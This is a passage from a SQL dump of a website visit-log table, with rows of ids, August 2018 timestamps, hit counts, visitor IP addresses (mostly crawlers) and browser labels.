,0,4,0,'66.249.66.156',''),(290361,1534615176,1,1,0,0,'8.29.198.27','other'),(290362,1534615292,1,1,0,0,'54.36.148.112','other'),(290363,1534615380,1,1,0,0,'54.36.149.103','other'),(290364,1534615428,1,1,0,0,'54.36.148.77','other'),(290365,1534615508,1,1,0,0,'54.36.148.245','other'),(290366,1534616114,1,1,0,0,'54.36.148.20','other'),(290367,1534616246,1,1,0,0,'54.36.148.139','other'),(290368,1534616247,1,0,1,0,'66.249.66.157',''),(290369,1534616282,1,1,0,0,'54.36.148.200','other'),(290370,1534616373,1,1,0,0,'95.163.255.93','other'),(290371,1534616420,1,1,0,0,'54.36.148.195','other'),(290372,1534616421,1,1,0,0,'54.36.148.181','other'),(290373,1534616537,1,1,0,0,'54.36.148.18','other'),(290374,1534616559,1,0,1,0,'66.249.66.156',''),(290375,1534616605,1,1,0,0,'54.36.148.82','other'),(290376,1534616798,1,1,0,0,'54.36.148.192','other'),(290377,1534616982,1,1,0,0,'54.36.148.118','other'),(290378,1534617049,1,1,0,0,'54.36.149.85','other'),(290379,1534617050,1,1,0,0,'54.36.148.108','other'),(290380,1534617258,1,1,0,0,'54.36.148.29','other'),(290381,1534617388,1,1,0,0,'54.36.148.10','other'),(290382,1534617668,2,2,0,0,'54.36.148.61','other'),(290383,1534617723,1,0,1,0,'66.249.66.157',''),(290384,1534618416,1,1,0,0,'157.55.39.88','other'),(290385,1534618658,1,1,0,0,'54.36.148.92','other'),(290386,1534618986,1,1,0,0,'54.36.148.140','other'),(290387,1534619007,1,1,0,0,'193.106.30.99','firefox'),(290388,1534619013,1,1,0,0,'54.36.148.239','other'),(290389,1534619262,1,1,0,0,'141.8.142.74','other'),(290390,1534619585,1,1,0,0,'54.36.148.243','other'),(290391,1534619952,2,0,2,0,'66.249.66.156',''),(290392,1534620022,1,1,0,0,'54.36.149.48','other'),(290393,1534620050,1,1,0,0,'54.36.148.64','other'),(290394,1534620133,1,1,0,0,'54.36.148.113','other'),(290395,1534620135,1,1,0,0,'54.36.149.23','other'),(290396,1534620401,1,1,0,0,'54.36.148.242','other'),(290397,1534620435,1,1,0,0,'54.36.148.143','other'),(290398,1534620528,1,1,0,0,'54.36.148.13','other'),(290399,1534620613,1,0,1,0,'66.249.66.61',''),(290400,1534620728,1,1,0,0,'54.36.148.210','other'),(290401,1534620899,1,0,1,0,'66.249.66.156',''),(290402,1534620905,1,1,0,0,'54.36.149.99','other'),(290403,1534621164,1,1,0,0,'54.36.148.195','other'),(290404,1534621200,1,1,0,0,'54.36.148.255','other'),(290405,1534621412,15,15,0,0,'96.44.183.124','other'),(290406,1534621427,1,1,0,0,'96.44.183.124','chrome'),(290407,1534621517,1,0,1,0,'66.249.66.155',''),(290408,1534621538,1,1,0,0,'54.36.148.213','other'),(290409,1534621602,1,1,0,0,'54.36.148.161','other'),(290410,1534621694,1,1,0,0,'54.36.148.107','other'),(290411,1534621730,1,1,0,0,'54.36.149.65','other'),(290412,1534621872,1,1,0,0,'54.36.148.146','other'),(290413,1534622102,1,1,0,0,'54.36.148.24','other'),(290414,1534622109,1,1,0,0,'54.36.148.22','other'),(290415,1534622148,1,1,0,0,'54.36.148.20','other'),(290416,1534622701,1,1,0,0,'54.36.148.41','other'),(290417,1534622757,1,1,0,0,'54.36.148.75','other'),(290418,1534622795,1,1,0,0,'157.55.39.11','other'),(290419,1534622893,1,1,0,0,'54.36.149.50','other'),(290420,1534622975,3,0,3,0,'66.249.66.157',''),(290421,1534622978,1,0,1,0,'66.249.66.156',''),(290422,1534623040,1,1,0,0,'216.244.66.241','other'),(290423,1534623351,1,1,0,0,'54.36.148.226','other'),(290424,1534623448,1,1,0,0,'8.29.198.25','other'),(290425,1534623782,1,1,0,0,'54.36.148.129','other'),(290426,1534623884,1,1,0,0,'54.36.148.219','other'),(290427,1534624049,1,1,0,0,'54.36.148.181','other'),(290428,1534624125,1,1,0,0,'54.36.148.78','other'),(290429,1534624520,1,1,0,0,'95.163.255.193','other'),(290430,1534624533,1,1,0,0,'54.36.148.204','other'),(290431,1534624563,1,1,0,0,'54.36.148.145','other'),(290432,1534624685,1,1,0,0,'95.163.255.92','other'),(290433,1534624727,1,1,0,0,'54.36.148.160','other'),(290434,1534625080,1,1,0,0,'216.244.66.241','other'),(290435,1534625359,1,0,1,0,'66.249.66.155',''),(290436,1534625383,1,1,0,0,'54.36.148.138','other'),(290437,1534625472,1,1,0,0,'151.37.71.21','chrome'),(290438,1534625477,1,1,0,0,'54.36.148.36','other'),(290439,1534625641,1,1,0,0,'54.36.149.75','other'),(290440,1534625844,1,1,0,0,'54.36.148.234','other'),(290441,1534625880,1,1,0,0,'54.36.149.38','other'),(290442,1534626034,1,1,0,0,'8.29.198.27','other'),(290443,1534626161,1,1,0,0,'54.36.148.80','other'),(290444,1534626190,1,0,1,0,'66.249.66.156',''),(290445,1534626299,1,1,0,0,'141.8.142.74','other'),(290446,1534626302,1,1,0,0,'54.36.149.13','other'),(290447,1534626390,2,2,0,0,'157.55.39.88','other'),(290448,1534626394,1,1,0,0,'54.36.148.81','other'),(290449,1534626432,1,1,0,0,'54.36.148.128','other'),(290450,1534626956,1,1,0,0,'91.226.253.93','chrome'),(290451,1534627054,1,1,0,0,'54.36.149.102','other'),(290452,1534627092,1,1,0,0,'54.36.148.17','other'),(290453,1534627123,1,1,0,0,'54.36.149.8','other'),(290454,1534627247,1,0,1,0,'66.249.66.155',''),(290455,1534627433,1,1,0,0,'216.244.66.241','other'),(290456,1534627542,1,1,0,0,'54.36.148.116','other'),(290457,1534627715,1,1,0,0,'54.36.148.64','other'),(290458,1534627731,1,1,0,0,'54.36.149.39','other'),(290459,1534627968,1,1,0,0,'54.36.148.29','other'),(290460,1534628061,1,1,0,0,'141.8.142.74','other'),(290461,1534628087,1,0,1,0,'66.249.66.156',''),(290462,1534628116,1,1,0,0,'54.36.149.34','other'),(290463,1534628381,1,1,0,0,'157.55.39.11','other'),(290464,1534628771,1,1,0,0,'54.36.149.41','other'),(290465,1534629130,1,1,0,0,'54.36.149.12','other'),(290466,1534629135,1,1,0,0,'54.36.149.93','other'),(290467,1534629194,1,1,0,0,'163.172.4.153','chrome'),(290468,1534629230,1,1,0,0,'54.36.148.218','other'),(290469,1534629274,1,1,0,0,'54.36.148.91','other'),(290470,1534629436,1,1,0,0,'54.36.148.143','other'),(290471,1534629459,1,1,0,0,'54.36.149.39','other'),(290472,1534629609,1,1,0,0,'54.36.148.194','other'),(290473,1534629728,1,1,0,0,'54.36.148.109','other'),(290474,1534629870,2,0,2,0,'66.249.66.155',''),(290475,1534629888,1,1,0,0,'54.36.149.18','other'),(290476,1534629918,1,1,0,0,'54.36.148.234','other'),(290477,1534629962,1,1,0,0,'54.36.148.157','other'),(290478,1534630217,1,1,0,0,'216.244.66.241','other'),(290479,1534630240,1,1,0,0,'37.9.113.182','other'),(290480,1534630461,1,1,0,0,'54.36.148.147','other'),(290481,1534630480,1,1,0,0,'54.36.148.73','other'),(290482,1534630641,1,0,1,0,'66.249.66.156',''),(290483,1534630831,1,1,0,0,'54.36.149.9','other'),(290484,1534630942,2,2,0,0,'54.36.148.55','other'),(290485,1534630975,1,1,0,0,'54.36.148.33','other'),(290486,1534631190,1,0,1,0,'66.249.66.59',''),(290487,1534631199,1,1,0,0,'54.36.148.99','other'),(290488,1534631633,1,1,0,0,'54.36.148.63','other'),(290489,1534631918,1,1,0,0,'65.99.205.69','firefox'),(290490,1534632444,1,1,0,0,'54.36.148.92','other'),(290491,1534632507,1,1,0,0,'54.36.149.53','other'),(290492,1534632958,1,1,0,0,'54.36.149.47','other'),(290493,1534633032,1,0,1,0,'66.249.66.157',''),(290494,1534633394,1,1,0,0,'54.36.148.51','other'),(290495,1534633513,1,1,0,0,'54.36.148.168','other'),(290496,1534633867,1,1,0,0,'54.36.149.89','other'),(290497,1534633929,2,2,0,0,'54.36.148.100','other'),(290498,1534633937,1,1,0,0,'54.36.148.84','other'),(290499,1534634147,1,1,0,0,'216.244.66.241','other'),(290500,1534634255,2,2,0,0,'54.36.148.232','other'),(290501,1534634295,1,1,0,0,'8.29.198.26','other'),(290502,1534634415,1,1,0,0,'54.36.149.58','other'),(290503,1534634640,1,1,0,0,'54.36.148.199','other'),(290504,1534634680,1,1,0,0,'54.36.148.18','other'),(290505,1534634703,2,0,2,0,'66.249.66.157',''),(290506,1534634909,1,1,0,0,'54.36.148.237','other'),(290507,1534635107,1,1,0,0,'54.36.149.36','other'),(290508,1534635120,1,0,1,0,'66.249.66.61',''),(290509,1534635157,1,1,0,0,'54.36.148.144','other'),(290510,1534635172,2,2,0,0,'141.8.142.74','other'),(290511,1534635578,1,1,0,0,'54.36.148.226','other'),(290512,1534635640,1,1,0,0,'54.36.148.99','other'),(290513,1534635838,1,1,0,0,'54.36.148.237','other'),(290514,1534635843,1,1,0,0,'54.36.148.28','other'),(290515,1534635955,1,1,0,0,'54.36.148.234','other'),(290516,1534636078,1,1,0,0,'54.36.148.51','other'),(290517,1534636463,1,1,0,0,'54.36.148.134','other'),(290518,1534636637,1,1,0,0,'54.36.148.123','other'),(290519,1534636889,1,1,0,0,'8.29.198.27','other'),(290520,1534637266,1,1,0,0,'54.36.148.51','other'),(290521,1534637324,1,1,0,0,'54.36.148.131','other'),(290522,1534637492,1,1,0,0,'54.36.149.61','other'),(290523,1534637498,1,1,0,0,'141.8.142.74','other'),(290524,1534637518,1,1,0,0,'157.55.39.88','other'),(290525,1534637613,1,1,0,0,'185.191.204.7','chrome'),(290526,1534637903,1,1,0,0,'54.36.148.29','other'),(290527,1534638011,1,1,0,0,'54.36.148.213','other'),(290528,1534638099,1,1,0,0,'54.36.148.210','other'),(290529,1534638147,1,1,0,0,'54.36.148.37','other'),(290530,1534638347,1,1,0,0,'54.36.148.167','other'),(290531,1534638686,1,1,0,0,'54.36.149.46','other'),(290532,1534639104,1,1,0,0,'54.36.148.93','other'),(290533,1534639131,1,1,0,0,'141.8.142.74','other'),(290534,1534639212,1,1,0,0,'54.36.148.30','other'),(290535,1534639333,1,0,1,0,'66.249.66.155',''),(290536,1534639365,1,1,0,0,'54.36.148.199','other'),(290537,1534639648,1,1,0,0,'54.36.148.148','other'),(290538,1534639953,1,1,0,0,'54.36.148.102','other'),(290539,1534640012,1,1,0,0,'54.36.149.99','other'),(290540,1534640013,1,1,0,0,'54.36.149.95','other'),(290541,1534640323,1,1,0,0,'54.36.149.25','other'),(290542,1534640671,1,1,0,0,'54.36.148.49','other'),(290543,1534641213,1,0,1,0,'66.249.66.155',''),(290544,1534641233,1,1,0,0,'54.36.148.110','other'),(290545,1534641237,1,1,0,0,'54.36.148.176','other'),(290546,1534641264,1,1,0,0,'87.250.224.46','other'),(290547,1534641593,1,1,0,0,'54.36.149.24','other'),(290548,1534641745,1,1,0,0,'141.8.142.74','other'),(290549,1534641986,1,1,0,0,'54.36.149.46','other'),(290550,1534641995,1,1,0,0,'54.36.149.106','other'),(290551,1534642273,1,0,1,0,'66.249.66.157',''),(290552,1534642934,1,1,0,0,'216.244.66.241','other'),(290553,1534643062,1,1,0,0,'54.36.148.213','other'),(290554,1534643107,1,1,0,0,'54.36.148.62','other'),(290555,1534643158,1,1,0,0,'54.36.148.252','other'),(290556,1534643313,1,1,0,0,'54.36.148.131','other'),(290557,1534643351,1,1,0,0,'54.36.148.222','other'),(290558,1534643445,1,1,0,0,'54.36.149.52','other'),(290559,1534643589,1,0,1,0,'66.249.66.157',''),(290560,1534643678,1,1,0,0,'54.36.148.19','other'),(290561,1534643693,1,1,0,0,'178.154.171.88','other'),(290562,1534643788,1,1,0,0,'54.36.148.61','other'),(290563,1534643812,1,1,0,0,'54.36.148.231','other'),(290564,1534643836,1,1,0,0,'54.36.148.253','other'),(290565,1534644017,1,1,0,0,'54.36.148.237','other'),(290566,1534644257,1,1,0,0,'54.36.148.211','other'),(290567,1534644536,1,1,0,0,'54.36.148.37','other'),(290568,1534644582,1,1,0,0,'52.34.24.33','chrome'),(290569,1534644798,1,1,0,0,'54.36.148.252','other'),(290570,1534644804,1,1,0,0,'54.36.149.82','other'),(290571,1534644918,1,1,0,0,'216.244.66.241','other'),(290572,1534645139,1,1,0,0,'8.29.198.25','other'),(290573,1534645153,1,1,0,0,'207.46.13.126','other'),(290574,1534645255,1,1,0,0,'40.77.167.123','other'),(290575,1534645326,1,1,0,0,'54.36.149.24','other'),(290576,1534645430,1,1,0,0,'54.36.149.99','other'),(290577,1534645480,1,1,0,0,'54.36.148.108','other'),(290578,1534645496,2,2,0,0,'141.8.142.74','other'),(290579,1534645500,1,1,0,0,'54.36.148.24','other'),(290580,1534645779,1,1,0,0,'54.36.149.47','other'),(290581,1534645841,1,1,0,0,'54.36.148.214','other'),(290582,1534645850,1,0,1,0,'66.249.66.157',''),(290583,1534645858,1,1,0,0,'54.36.148.174','other'),(290584,1534646210,1,1,0,0,'54.36.149.66','other'),(290585,1534646310,1,1,0,0,'178.154.171.88','other'),(290586,1534646314,1,1,0,0,'54.36.148.114','other'),(290587,1534646652,1,1,0,0,'54.36.148.103','other'),(290588,1534646666,1,1,0,0,'54.36.148.43','other'),(290589,1534647047,1,0,1,0,'66.249.66.155',''),(290590,1534647157,1,1,0,0,'141.8.142.74','other'),(290591,1534647410,1,1,0,0,'54.36.148.174','other'),(290592,1534647741,1,1,0,0,'8.29.198.25','other'),(290593,1534648142,1,1,0,0,'141.8.142.74','other'),(290594,1534648312,1,0,1,0,'66.249.66.156',''),(290595,1534648516,1,0,1,0,'66.249.66.155',''),(290596,1534648795,2,2,0,0,'54.36.149.63','other'),(290597,1534648880,1,0,1,0,'66.249.66.61',''),(290598,1534648883,1,1,0,0,'54.165.59.7','other'),(290599,1534648908,1,1,0,0,'54.36.148.186','other'),(290600,1534649056,1,1,0,0,'54.36.148.200','other'),(290601,1534649338,1,1,0,0,'54.36.148.209','other'),(290602,1534649928,1,1,0,0,'37.9.113.182','other'),(290603,1534651064,1,1,0,0,'54.36.148.25','other'),(290604,1534651105,1,1,0,0,'54.36.148.87','other'),(290605,1534651122,1,1,0,0,'54.36.148.113','other'),(290606,1534651220,1,0,1,0,'66.249.66.157',''),(290607,1534651312,1,1,0,0,'141.8.142.74','other'),(290608,1534651341,2,1,1,0,'66.249.66.157',''),(290609,1534651499,1,1,0,0,'213.180.203.8','other'),(290610,1534651523,1,1,0,0,'54.36.148.168','other'),(290611,1534651879,1,1,0,0,'54.36.148.224','other'),(290612,1534651936,1,1,0,0,'54.36.148.173','other'),(290613,1534651971,1,1,0,0,'54.36.149.35','other'),(290614,1534652018,1,0,1,0,'66.249.66.156',''),(290615,1534652066,1,1,0,0,'54.36.148.122','other'),(290616,1534652184,1,1,0,0,'54.36.148.217','other'),(290617,1534652261,1,1,0,0,'54.36.148.236','other'),(290618,1534652368,1,1,0,0,'64.182.65.132','firefox'),(290619,1534652379,1,1,0,0,'94.130.9.183','other'),(290620,1534652423,1,1,0,0,'54.36.148.234','other'),(290621,1534652495,1,1,0,0,'157.55.39.114','other'),(290622,1534652501,1,1,0,0,'54.36.148.225','other'),(290623,1534652515,1,1,0,0,'54.36.148.52','other'),(290624,1534652677,1,0,1,0,'66.249.66.155',''),(290625,1534652714,1,1,0,0,'54.36.148.201','other'),(290626,1534652790,1,1,0,0,'54.36.149.55','other'),(290627,1534652862,1,1,0,0,'54.36.148.42','other'),(290628,1534652889,1,1,0,0,'54.36.149.70','other'),(290629,1534653279,1,1,0,0,'54.36.148.80','other'),(290630,1534653372,1,1,0,0,'54.36.148.156','other'),(290631,1534653638,2,0,2,0,'66.249.66.155',''),(290632,1534653690,1,1,0,0,'54.36.148.119','other'),(290633,1534653927,1,1,0,0,'54.36.148.186','other'),(290634,1534654137,1,1,0,0,'54.36.148.214','other'),(290635,1534654159,1,1,0,0,'141.8.142.74','other'),(290636,1534654218,1,1,0,0,'157.55.39.155','other'),(290637,1534654329,1,1,0,0,'54.36.149.99','other'),(290638,1534654381,1,1,0,0,'54.36.149.39','other'),(290639,1534654456,1,1,0,0,'54.36.148.251','other'),(290640,1534654488,1,1,0,0,'178.154.171.88','other'),(290641,1534654510,1,0,1,0,'66.249.66.157',''),(290642,1534654802,1,1,0,0,'54.36.148.235','other'),(290643,1534655146,1,1,0,0,'216.244.66.241','other'),(290644,1534655163,1,1,0,0,'54.36.149.38','other'),(290645,1534655251,1,1,0,0,'54.36.148.164','other'),(290646,1534655262,1,1,0,0,'54.36.149.83','other'),(290647,1534655384,1,1,0,0,'141.8.142.74','other'),(290648,1534655811,1,1,0,0,'54.36.148.150','other'),(290649,1534655989,1,1,0,0,'54.36.148.91','other'),(290650,1534655990,1,1,0,0,'8.29.198.25','other'),(290651,1534656296,1,1,0,0,'54.165.59.7','other'),(290652,1534656355,1,1,0,0,'54.36.148.188','other'),(290653,1534656560,1,1,0,0,'54.36.148.238','other'),(290654,1534656617,1,1,0,0,'54.36.148.214','other'),(290655,1534656813,1,1,0,0,'54.36.148.179','other'),(290656,1534656951,1,0,1,0,'188.110.130.136',''),(290657,1534657049,1,1,0,0,'95.163.255.163','other'),(290658,1534657109,1,1,0,0,'91.196.178.135','firefox'),(290659,1534657491,1,1,0,0,'54.36.148.106','other'),(290660,1534657631,1,0,1,0,'66.249.66.59',''),(290661,1534657671,1,1,0,0,'54.36.148.155','other'),(290662,1534657810,1,1,0,0,'54.36.149.49','other'),(290663,1534657851,1,1,0,0,'54.36.148.216','other'),(290664,1534657907,1,1,0,0,'216.244.66.241','other'),(290665,1534658005,1,1,0,0,'54.36.149.44','other'),(290666,1534658119,1,0,1,0,'66.249.66.155',''),(290667,1534658415,1,1,0,0,'157.55.39.126','other'),(290668,1534658530,1,1,0,0,'54.36.148.28','other'),(290669,1534658537,1,0,1,0,'66.249.66.156',''),(290670,1534658607,1,1,0,0,'8.29.198.25','other'),(290671,1534658618,1,1,0,0,'54.36.149.30','other'),(290672,1534658681,1,1,0,0,'54.36.148.189','other'),(290673,1534658744,1,1,0,0,'54.36.148.170','other'),(290674,1534659179,1,1,0,0,'54.36.148.192','other'),(290675,1534659304,1,1,0,0,'54.36.148.230','other'),(290676,1534659559,1,1,0,0,'54.36.148.152','other'),(290677,1534659768,1,1,0,0,'54.36.148.161','other'),(290678,1534660188,1,1,0,0,'54.36.148.57','other'),(290679,1534660251,1,1,0,0,'54.36.149.32','other'),(290680,1534660284,7,7,0,0,'94.130.9.183','other'),(290681,1534660361,1,1,0,0,'54.36.148.24','other'),(290682,1534660394,1,1,0,0,'141.8.142.74','other'),(290683,1534660420,1,1,0,0,'216.244.66.241','other'),(290684,1534660448,1,1,0,0,'54.36.148.99','other'),(290685,1534660761,1,1,0,0,'54.36.148.183','other'),(290686,1534660782,1,1,0,0,'54.36.148.26','other'),(290687,1534660784,1,1,0,0,'54.36.149.71','other'),(290688,1534660872,1,1,0,0,'54.36.148.28','other'),(290689,1534660942,1,0,1,0,'66.249.66.155',''),(290690,1534661102,2,1,1,0,'66.249.66.156',''),(290691,1534661105,1,0,1,0,'66.249.66.61',''),(290692,1534661188,8,8,0,0,'94.130.9.183','other'),(290693,1534661204,1,1,0,0,'54.36.148.230','other'),(290694,1534661257,1,1,0,0,'54.36.148.72','other'),(290695,1534661335,1,1,0,0,'94.154.211.79','other'),(290696,1534661727,1,1,0,0,'54.36.149.48','other'),(290697,1534661740,1,1,0,0,'54.36.149.51','other'),(290698,1534661877,1,1,0,0,'54.36.148.167','other'),(290699,1534662107,7,7,0,0,'94.130.9.183','other'),(290700,1534662155,1,1,0,0,'54.36.148.33','other'),(290701,1534662315,1,1,0,0,'54.36.149.100','other'),(290702,1534662357,1,0,1,0,'66.249.66.61',''),(290703,1534662618,1,1,0,0,'54.36.148.207','other'),(290704,1534662844,1,1,0,0,'95.163.255.195','other'),(290705,1534663024,1,1,0,0,'54.36.148.168','other'),(290706,1534663028,7,7,0,0,'94.130.9.183','other'),(290707,1534663075,2,2,0,0,'91.196.178.187','chrome'),(290708,1534663098,1,1,0,0,'54.36.149.56','other'),(290709,1534663276,1,0,1,0,'66.249.66.61',''),(290710,1534663400,1,0,1,0,'66.249.66.156',''),(290711,1534663448,1,1,0,0,'54.36.149.8','other'),(290712,1534663483,1,1,0,0,'66.249.66.156','chrome'),(290713,1534663507,1,1,0,0,'216.244.66.241','other'),(290714,1534663544,1,1,0,0,'54.36.148.240','other'),(290715,1534663793,1,0,1,0,'66.249.66.157',''),(290716,1534663909,1,1,0,0,'54.36.148.132','other'),(290717,1534663942,7,7,0,0,'94.130.9.183','other'),(290718,1534663974,1,1,0,0,'54.36.148.68','other'),(290719,1534664020,1,1,0,0,'54.36.148.185','other'),(290720,1534664197,1,1,0,0,'141.8.142.74','other'),(290721,1534664289,1,1,0,0,'54.36.148.244','other'),(290722,1534664383,1,1,0,0,'54.36.148.195','other'),(290723,1534664856,8,8,0,0,'94.130.9.183','other'),(290724,1534664880,1,1,0,0,'46.211.119.217','chrome'),(290725,1534665273,1,1,0,0,'54.36.148.11','other'),(290726,1534665760,7,7,0,0,'94.130.9.183','other'),(290727,1534665800,1,1,0,0,'216.244.66.241','other'),(290728,1534665999,1,1,0,0,'5.188.210.44','firefox'),(290729,1534666002,1,1,0,0,'54.36.148.89','other'),(290730,1534666132,1,1,0,0,'178.95.159.66','chrome'),(290731,1534666343,1,1,0,0,'54.36.148.178','other'),(290732,1534666364,1,1,0,0,'54.36.148.36','other'),(290733,1534666376,1,1,0,0,'54.36.148.211','other'),(290734,1534666652,1,1,0,0,'157.55.39.11','other'),(290735,1534666691,4,4,0,0,'94.130.9.183','other'),(290736,1534666837,1,1,0,0,'8.29.198.26','other'),(290737,1534666896,1,1,0,0,'54.36.148.144','other'),(290738,1534667049,1,1,0,0,'54.36.148.99','other'),(290739,1534667191,1,1,0,0,'178.154.171.4','other'),(290740,1534667258,1,1,0,0,'54.36.149.4','other'),(290741,1534667354,1,1,0,0,'54.36.148.101','other'),(290742,1534667388,1,1,0,0,'178.154.171.88','other'),(290743,1534667484,2,2,0,0,'141.8.142.74','other'),(290744,1534667718,1,1,0,0,'54.36.148.217','other'),(290745,1534667975,1,1,0,0,'95.163.255.154','other'),(290746,1534668079,1,1,0,0,'54.36.148.33','other'),(290747,1534668245,1,1,0,0,'54.36.148.174','other'),(290748,1534668296,1,0,1,0,'66.249.66.59',''),(290749,1534668485,1,1,0,0,'216.244.66.241','other'),(290750,1534668546,1,0,1,0,'66.249.66.156',''),(290751,1534668554,1,1,0,0,'54.165.59.7','other'),(290752,1534668665,1,1,0,0,'54.36.149.59','other'),(290753,1534668756,1,1,0,0,'87.250.224.46','other'),(290754,1534668815,1,1,0,0,'91.196.178.91','chrome'),(290755,1534668817,1,1,0,0,'54.36.148.24','other'),(290756,1534668823,1,1,0,0,'54.36.148.167','other'),(290757,1534668842,1,1,0,0,'157.55.39.155','other'),(290758,1534668901,1,1,0,0,'31.13.115.10','other'),(290759,1534668936,1,1,0,0,'31.13.127.6','other'),(290760,1534668937,1,1,0,0,'31.13.115.6','other'),(290761,1534668960,1,1,0,0,'173.252.95.13','other'),(290762,1534669052,1,1,0,0,'54.36.148.240','other'),(290763,1534669089,1,1,0,0,'54.36.148.214','other'),(290764,1534669149,1,1,0,0,'54.36.148.35','other'),(290765,1534669304,1,1,0,0,'54.36.148.215','other'),(290766,1534669473,2,2,0,0,'54.36.148.170','other'),(290767,1534669518,1,1,0,0,'66.249.66.155','chrome'),(290768,1534669574,1,1,0,0,'54.36.148.131','other'),(290769,1534669631,1,1,0,0,'54.36.148.158','other'),(290770,1534669747,1,1,0,0,'178.154.171.88','other'),(290771,1534669756,1,1,0,0,'54.36.148.64','other'),(290772,1534669864,1,1,0,0,'54.36.148.154','other'),(290773,1534670184,1,1,0,0,'54.36.149.1','other'),(290774,1534670233,1,1,0,0,'54.36.148.222','other'),(290775,1534670779,1,1,0,0,'54.36.148.67','other'),(290776,1534670795,1,1,0,0,'216.244.66.241','other'),(290777,1534670877,1,1,0,0,'54.36.148.170','other'),(290778,1534670919,1,1,0,0,'91.196.178.73','chrome'),(290779,1534670953,1,1,0,0,'95.160.159.249','chrome'),(290780,1534671054,1,1,0,0,'54.36.148.142','other'),(290781,1534671518,1,1,0,0,'54.36.149.64','other'),(290782,1534671657,1,1,0,0,'54.36.148.113','other'),(290783,1534671751,1,1,0,0,'54.36.149.57','other'),(290784,1534671820,1,1,0,0,'95.163.255.97','other'),(290785,1534671856,1,1,0,0,'54.36.148.237','other'),(290786,1534671980,4,0,4,0,'66.249.66.156',''),(290787,1534671981,22,0,22,0,'66.249.66.155',''),(290788,1534672039,3,3,0,0,'66.249.66.155','chrome'),(290789,1534672085,1,1,0,0,'54.36.148.122','other'),(290790,1534672133,1,1,0,0,'54.36.148.79','other'),(290791,1534672165,1,1,0,0,'141.8.142.74','other'),(290792,1534672476,1,1,0,0,'54.36.149.42','other'),(290793,1534672564,1,1,0,0,'54.36.149.12','other'),(290794,1534672830,1,1,0,0,'54.36.149.22','other'),(290795,1534672831,1,1,0,0,'54.36.148.155','other'),(290796,1534673012,1,0,1,0,'66.249.66.157',''),(290797,1534673059,1,1,0,0,'66.249.66.156','chrome'),(290798,1534673141,1,1,0,0,'178.154.171.88','other'),(290799,1534673197,1,0,1,0,'66.249.66.155',''),(290800,1534673286,2,2,0,0,'54.36.148.17','other'),(290801,1534673400,1,1,0,0,'54.36.148.211','other'),(290802,1534674183,2,2,0,0,'141.8.142.74','other'),(290803,1534674320,1,1,0,0,'66.249.66.157','chrome'),(290804,1534674575,1,1,0,0,'54.36.149.103','other'),(290805,1534674629,1,1,0,0,'54.36.149.90','other'),(290806,1534674777,1,1,0,0,'46.211.7.201','chrome'),(290807,1534674879,1,1,0,0,'54.36.148.164','other'),(290808,1534674998,1,1,0,0,'54.36.148.107','other'),(290809,1534675024,1,1,0,0,'66.249.66.156','chrome'),(290810,1534675184,1,1,0,0,'141.8.142.74','other'),(290811,1534675245,1,1,0,0,'54.36.149.70','other'),(290812,1534675541,1,0,1,0,'66.249.66.61',''),(290813,1534675550,1,0,1,0,'66.249.66.57',''),(290814,1534675563,1,1,0,0,'54.36.148.170','other'),(290815,1534675701,1,1,0,0,'46.211.7.201','chrome'),(290816,1534675709,1,1,0,0,'157.55.39.126','other'),(290817,1534675924,1,1,0,0,'157.55.39.155','other'),(290818,1534675982,1,1,0,0,'54.36.148.146','other'),(290819,1534676135,1,1,0,0,'178.154.171.88','other'),(290820,1534676151,1,1,0,0,'87.250.224.46','other'),(290821,1534676203,1,0,1,0,'66.249.66.157',''),(290822,1534676406,1,1,0,0,'54.36.149.83','other'),(290823,1534676479,1,1,0,0,'54.36.148.199','other'),(290824,1534676595,1,1,0,0,'54.36.148.175','other'),(290825,1534676708,1,1,0,0,'54.36.148.24','other'),(290826,1534676730,1,1,0,0,'141.8.142.74','other'),(290827,1534676856,1,0,1,0,'66.249.66.155',''),(290828,1534677069,1,1,0,0,'54.36.148.150','other'),(290829,1534677111,1,1,0,0,'54.36.148.153','other'),(290830,1534677331,1,1,0,0,'54.36.149.43','other'),(290831,1534677363,1,1,0,0,'54.36.148.116','other'),(290832,1534677458,1,1,0,0,'92.113.189.235','chrome'),(290833,1534677502,1,1,0,0,'54.36.148.195','other'),(290834,1534677639,1,1,0,0,'54.36.148.167','other'),(290835,1534677670,1,1,0,0,'8.29.198.26','other'),(290836,1534677760,1,0,1,0,'66.249.66.155',''),(290837,1534677847,1,0,1,0,'66.249.66.157',''),(290838,1534678007,1,1,0,0,'54.36.149.70','other'),(290839,1534678197,1,1,0,0,'54.36.148.221','other'),(290840,1534678489,1,1,0,0,'95.163.255.95','other'),(290841,1534679023,1,1,0,0,'54.36.148.204','other'),(290842,1534679162,1,1,0,0,'54.36.149.34','other'),(290843,1534679257,1,1,0,0,'54.36.148.54','other'),(290844,1534679720,1,1,0,0,'66.249.66.157','chrome'),(290845,1534679755,1,1,0,0,'54.36.148.104','other'),(290846,1534679772,1,1,0,0,'54.36.148.170','other'),(290847,1534679795,1,1,0,0,'54.36.148.115','other'),(290848,1534679844,1,1,0,0,'54.36.148.167','other'),(290849,1534680302,1,1,0,0,'91.209.11.236','other'),(290850,1534680553,1,1,0,0,'54.36.148.177','other'),(290851,1534680638,1,1,0,0,'54.36.148.124','other'),(290852,1534680717,1,1,0,0,'54.36.148.101','other'),(290853,1534680815,1,1,0,0,'54.36.148.71','other'),(290854,1534680865,1,1,0,0,'216.244.66.241','other'),(290855,1534681003,1,1,0,0,'91.196.178.41','chrome'),(290856,1534681019,1,0,1,0,'66.249.66.156',''),(290857,1534681286,1,1,0,0,'54.36.148.210','other'),(290858,1534681380,1,1,0,0,'157.55.39.11','other'),(290859,1534681468,1,1,0,0,'178.154.171.88','other'),(290860,1534682849,1,1,0,0,'141.8.142.74','other'),(290861,1534683173,1,1,0,0,'54.36.148.241','other'),(290862,1534683249,1,1,0,0,'54.36.148.122','other'),(290863,1534683288,1,1,0,0,'54.36.148.185','other'),(290864,1534683314,1,1,0,0,'54.36.148.148','other'),(290865,1534683551,1,1,0,0,'66.249.66.157','chrome'),(290866,1534683773,1,1,0,0,'54.36.148.36','other'),(290867,1534683823,1,1,0,0,'54.36.149.28','other'),(290868,1534683897,1,1,0,0,'54.36.148.57','other'),(290869,1534684109,1,1,0,0,'54.36.148.87','other'),(290870,1534684144,1,1,0,0,'54.36.148.250','other'),(290871,1534684271,1,1,0,0,'54.36.149.0','other'),(290872,1534684422,1,1,0,0,'216.244.66.241','other'),(290873,1534684561,1,1,0,0,'54.36.148.126','other'),(290874,1534684689,1,1,0,0,'54.36.149.79','other'),(290875,1534684810,1,1,0,0,'54.36.148.176','other'),(290876,1534684958,1,0,1,0,'66.249.66.156',''),(290877,1534684976,1,0,1,0,'6